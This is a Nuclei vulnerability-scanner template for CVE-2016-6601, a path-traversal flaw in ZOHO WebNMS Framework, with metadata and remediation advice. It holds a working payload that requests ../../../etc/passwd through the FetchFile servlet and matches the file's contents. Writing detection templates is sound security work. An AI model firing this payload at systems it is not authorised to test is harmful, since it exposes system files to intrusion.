nuclei-templates/http/cves/2016/CVE-2016-6601.yaml

46 lines
1.8 KiB
YAML

id: CVE-2016-6601
info:
name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
author: 0x_Akoko
severity: high
description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.
remediation: |
Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability.
reference:
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
- https://www.exploit-db.com/exploits/40229/
- https://nvd.nist.gov/vuln/detail/CVE-2016-6601
- http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure
- http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-6601
cwe-id: CWE-22
epss-score: 0.97503
epss-percentile: 0.99977
cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zohocorp
product: webnms_framework
tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp
http:
- method: GET
path:
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# digest: 4a0a004730450220269d98ed6d3161ad0db0a03a7f0809a5f7c818c3ecc57b34ee4d3d4c63eaab40022100e6f5a74ea3414e32776536a764ae0baf50b8f383108184f7d3181f2b5d68cc24:922c64590222798bb761d5b6d8e72950